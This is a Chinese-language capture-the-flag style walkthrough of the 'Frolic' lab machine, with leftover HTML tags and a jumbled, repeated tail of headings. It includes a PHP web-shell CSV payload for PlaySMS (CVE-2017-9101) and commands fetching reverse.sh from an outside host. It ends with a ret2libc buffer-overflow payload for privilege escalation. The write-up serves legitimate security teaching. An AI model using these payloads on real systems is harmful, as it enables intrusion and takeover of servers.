Frolic靶机渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描<\/h3>
使用nmap进行全端口扫描：<\/p>
nmap -p- 10.10.10.111 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22\/tcp - OpenSSH 7.2p2 Ubuntu<\/li>
139\/tcp - Samba smbd 3.X - 4.X<\/li>
445\/tcp - Samba smbd 4.3.11-Ubuntu<\/li>
1880\/tcp - Node.js (Express middleware)<\/li>
9999\/tcp - nginx 1.10.3 (Ubuntu)<\/li>
<\/ul>
1.2 Web目录扫描<\/h3>
使用gobuster扫描web目录：<\/p>
gobuster dir -u "http:\/\/10.10.10.111:9999"<\/span> -w \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-small-words.txt -x txt,php -b 404,403 -t 50<\/span>
<\/span><\/span><\/code><\/pre>发现关键路径：<\/p>

\/admin\/success.html<\/code> - 包含Ook!密文<\/li>
\/asdiSIAJJ0QWE9JAS\/<\/code> - 可疑路径<\/li>
<\/ul>
2. 初始访问<\/h2>
2.1 Ook!密文解密<\/h3>

访问\/admin\/success.html<\/code>发现提示"Nothing here check \/asdiSIAJJ0QWE9JAS"<\/li>
访问该路径获取base64编码数据<\/li>
解码base64数据：<\/li>
<\/ol>
echo "UEsDBBQACQAIAMOJN00j\/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m\/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb\/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi\/kY6ZTAJ3h\/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn\/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j\/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA"<\/span> | base64 -d > out
<\/span><\/span><\/code><\/pre>
使用binwalk分析文件：<\/li>
<\/ol>
binwalk out
<\/span><\/span><\/code><\/pre>
发现是zip文件，使用zip2john和john爆破密码：<\/li>
<\/ol>
unzip out
<\/span><\/span>zip2john out > hash
<\/span><\/span>john hash --wordlist=<\/span>\/usr\/share\/wordlists\/rockyou.txt
<\/span><\/span><\/code><\/pre>
解压后得到index.php文件，包含另一段编码数据：<\/li>
<\/ol>
echo<\/span> "4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a"<\/span> |<\/span> xxd<\/span> -<\/span>r<\/span> -<\/span>p<\/span>
<\/span><\/span><\/code><\/pre>
解码后得到另一段base64：<\/li>
<\/ol>
echo "KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwrKysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysgK1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0tLS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg=="<\/span> | base64 -d
<\/span><\/span><\/code><\/pre>
最终解密得到Ook!语言代码，可使用在线工具解密<\/li>
<\/ol>
3. Play-SMS漏洞利用<\/h2>
3.1 发现Play-SMS<\/h3>
通过目录扫描发现：<\/p>
gobuster dir -u "http:\/\/10.10.10.111:9999\/dev\/"<\/span> -w \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-small-words.txt -x txt,php -b 404,403 -t 50<\/span>
<\/span><\/span><\/code><\/pre>访问路径：<\/p>
http:\/\/10.10.10.111:9999\/playsms\/index.php?app=main&inc=core_auth&route=login
<\/code><\/pre>
发现PlaySMS 1.4版本，已知存在RCE漏洞（CVE-2017-9101）<\/p>
3.2 利用PlaySMS上传漏洞<\/h3>

构造恶意CSV文件：<\/li>
<\/ol>
Name,Mobile,Email,Group code,Tags<?php system($_GET[1]); ?>,x,,,
<\/code><\/pre>

上传CSV文件：<\/li>
<\/ol>
http:\/\/10.10.10.111:9999\/playsms\/index.php?app=main&inc=feature_phonebook&route=import&op=list
<\/code><\/pre>

执行命令：<\/li>
<\/ol>
http:\/\/10.10.10.111:9999\/playsms\/index.php?1=ls&app=main&inc=feature_phonebook&op=phonebook_list
<\/code><\/pre>

获取反向shell：<\/li>
<\/ol>
# 下载reverse.sh<\/span>
<\/span><\/span>http:\/\/10.10.10.111:9999\/playsms\/index.php?1=<\/span>cd%20\/dev\/shm;wget%20http:\/\/10.10.16.14\/reverse.sh&app=<\/span>main&inc=<\/span>feature_phonebook&op=<\/span>phonebook_list
<\/span><\/span>
<\/span><\/span># 添加执行权限<\/span>
<\/span><\/span>http:\/\/10.10.10.111:9999\/playsms\/index.php?1=<\/span>chmod%20%2Bx%20\/dev\/shm\/reverse.sh;ls%20-la%20\/dev\/shm&app=<\/span>main&inc=<\/span>feature_phonebook&op=<\/span>phonebook_list
<\/span><\/span>
<\/span><\/span># 执行<\/span>
<\/span><\/span>http:\/\/10.10.10.111:9999\/playsms\/index.php?1=<\/span>\/dev\/shm\/reverse.sh&app=<\/span>main&inc=<\/span>feature_phonebook&op=<\/span>phonebook_list
<\/span><\/span><\/code><\/pre>4. 权限提升<\/h2>
4.1 发现SUID二进制文件<\/h3>
在\/home\/ayush\/.binary\/<\/code>目录下发现rop二进制文件，具有SUID权限<\/p>
4.2 缓冲区溢出分析<\/h3>

检查ASLR状态：<\/li>
<\/ol>
cat \/proc\/sys\/kernel\/randomize_va_space
<\/span><\/span># 发现ASLR关闭（值为0）<\/span>
<\/span><\/span><\/code><\/pre>
使用gdb分析：<\/li>
<\/ol>
gdb -q .\/rop
<\/span><\/span><\/code><\/pre>
创建模式字符串：<\/li>
<\/ol>
pattern_create 1000<\/span>
<\/span><\/span><\/code><\/pre>
运行程序并确定溢出点：<\/li>
<\/ol>
run 'A......'<\/span>
<\/span><\/span>pattern_offset 0x41474141
<\/span><\/span># 发现缓冲区溢出大小为52字节<\/span>
<\/span><\/span><\/code><\/pre>4.3 ROP链构造<\/h3>

检查程序依赖库：<\/li>
<\/ol>
ldd rop
<\/span><\/span># 发现libc.so.6基地址为0xb7e19000<\/span>
<\/span><\/span><\/code><\/pre>
查找关键函数和字符串偏移：<\/li>
<\/ol>
readelf -s \/lib\/i386-linux-gnu\/libc.so.6 | grep " system@"<\/span>
<\/span><\/span># system偏移：0x0003ada0<\/span>
<\/span><\/span>
<\/span><\/span>readelf -s \/lib\/i386-linux-gnu\/libc.so.6 | grep " exit@"<\/span>
<\/span><\/span># exit偏移：0x0002e9d0<\/span>
<\/span><\/span>
<\/span><\/span>strings -a -t x \/lib\/i386-linux-gnu\/libc.so.6 | grep \/bin\/sh
<\/span><\/span># \/bin\/sh偏移：0x15ba0b<\/span>
<\/span><\/span><\/code><\/pre>
计算实际内存地址：<\/li>
<\/ol>
system: 0xb7e19000 + 0x0003ada0 =<\/span> 0xB7E53DA0
<\/span><\/span>exit: 0xb7e19000 + 0x0002e9d0 =<\/span> 0xB7E479D0
<\/span><\/span>\/bin\/sh: 0xb7e19000 + 0x15ba0b =<\/span> 0xB7F74A0B
<\/span><\/span><\/code><\/pre>
构造ROP链：<\/li>
<\/ol>
BUFF(52字节) + SYSTEM地址 + EXIT地址 + \/bin\/sh地址
<\/code><\/pre>

执行ROP攻击：<\/li>
<\/ol>
.\/rop $(<\/span>python2 -c 'print("A"*52 + "\xA0\x3D\xE5\xB7" + "\xD0\x79\xE4\xB7" + "\x0B\x4A\xF7\xB7")'<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>5. 总结<\/h2>
本渗透测试过程涉及：<\/p>

信息收集与端口扫描<\/li>
编码数据解密（多层base64和Ook!语言）<\/li>
PlaySMS漏洞利用（CVE-2017-9101）<\/li>
缓冲区溢出与ROP链构造<\/li>
利用SUID二进制文件进行权限提升<\/li>
<\/ol>
关键点：<\/p>

多层编码数据的识别与解密<\/li>
PlaySMS的CSV上传漏洞利用<\/li>
在ASLR关闭环境下构造ROP链<\/li>
利用libc中的函数和字符串地址绕过DEP保护<\/li>
<\/ul>
Frolic靶机渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. 初始访问<\/h2>

3. Play-SMS漏洞利用<\/h2>

4. 权限提升<\/h2>

4.1 发现SUID二进制文件<\/h3> 在\/home\/ayush\/.binary\/<\/code>目录下发现rop二进制文件，具有SUID权限<\/p>

4.1 发现SUID二进制文件<\/h3>
在`\/home\/ayush\/.binary\/<\/code>目录下发现rop二进制文件，具有SUID权限<\/p>`
